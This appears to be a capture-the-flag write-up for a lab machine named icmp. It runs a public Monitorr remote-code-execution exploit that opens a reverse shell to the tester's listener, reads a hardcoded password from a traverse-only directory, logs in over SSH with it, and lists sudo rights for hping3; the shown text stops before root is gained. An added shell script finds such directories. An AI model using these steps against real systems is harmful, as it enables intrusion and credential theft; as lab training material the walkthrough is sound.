Pwned Date - 14th Oct 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: Monitorr | Monitorr
|_Requested resource was http://192.168.161.218/mon/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


┌──(kali㉿kali)-[~]
└─$ searchsploit monitorr
--------------------------------------------- ---------------------------------
 Exploit Title                               |  Path
--------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass       | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Una | php/webapps/48980.py
--------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

searchsploit -m 48980
┌──(kali㉿kali)-[~]
└─$ python3 48980.py 
specify params in format: python 48980.py target_url lhost lport
┌──(kali㉿kali)-[~]
└─$ python3 48980.py http://192.168.161.218/mon/ 192.168.49.161 443
A shell script should be uploaded. Now we try to execute it
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.161] from (UNKNOWN) [192.168.161.218] 34270
bash: cannot set terminal process group (570): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ whoami
whoami
www-data

Privilege Escalation to fox user

The web user can read fox's home directory. The odd entry is devel: its mode is drwx--x--x, so other users have execute (traverse) on it but not read. That means we cannot list it, but we can still open any file inside it if we know the file's name.

www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3  2020 .
drwxr-xr-x 3 root root 4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Oct 14 15:02 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

We still cannot ls devel, but the reminder names crypt.php, so we can request that file directly by path:

www-data@icmp:/home/fox$ ls -la devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3  2020 devel/crypt.php
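Traverse-only directories like devel are easy to miss during enumeration because ls simply fails on them. The following script is an added example, not part of the original writeup: it finds directories whose "others" bits grant execute but not read, and then probes such a directory for filenames learned elsewhere (here, from the reminder file). The directory tree it builds under mktemp is constructed for the demo and mirrors the /home/fox/devel layout above.

```sh
#!/bin/sh
# Added example (not from the original writeup): locate directories that
# grant execute (traverse) but not read to "others", i.e. drwx--x--x like
# /home/fox/devel, and probe them for filenames learned elsewhere.
# The paths and filenames used in demo() are constructed for this example.

# Print every directory under $1 whose "others" bits include x but not r.
# -perm -001 / -perm -004 are octal, so this works with POSIX find.
traverse_only_dirs() {
  find "$1" -type d -perm -001 ! -perm -004 2>/dev/null
}

# Report whether a candidate file inside a traverse-only directory is
# readable by the current user: exit 0 if readable, 1 if absent/unreadable.
# Opening by full path only needs x on the directory, not r.
probe_file() {
  [ -r "$1/$2" ]
}

# Build a constructed tree mirroring the writeup's layout and run both checks.
# Note: as root you can list the directory anyway (root bypasses mode bits),
# but the find-based check still flags it for an unprivileged user.
demo() {
  base=$(mktemp -d)
  mkdir -p "$base/home/fox/devel"
  printf '<?php echo crypt("x","da"); ?>\n' > "$base/home/fox/devel/crypt.php"
  chmod 711 "$base/home/fox/devel"

  echo "traverse-only directories under $base/home:"
  traverse_only_dirs "$base/home"

  # Guess names gathered from other sources (the reminder mentions crypt.php
  # and a planned decrypt script that does not exist).
  for name in crypt.php decrypt.php; do
    if probe_file "$base/home/fox/devel" "$name"; then
      echo "readable: $name"
    else
      echo "not readable or absent: $name"
    fi
  done
  rm -rf "$base"
}
```

Source the script and call demo to see the run; against a real target, call traverse_only_dirs /home as the low-privileged user and feed probe_file with filenames taken from notes, scripts, cron entries or web config.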

www-data@icmp:/home/fox$ cat devel/crypt.php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>

crypt() is a one-way hash, so there is nothing to decrypt: the plaintext passed to it is sitting in the script. That string is fox's password, and it is reused for SSH:

sshpass -p "BUHNIJMONIBUVCYTTYVGBUHJNI" ssh [email protected]

Privilege Escalation to root user

Running sudo -l as fox:

Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3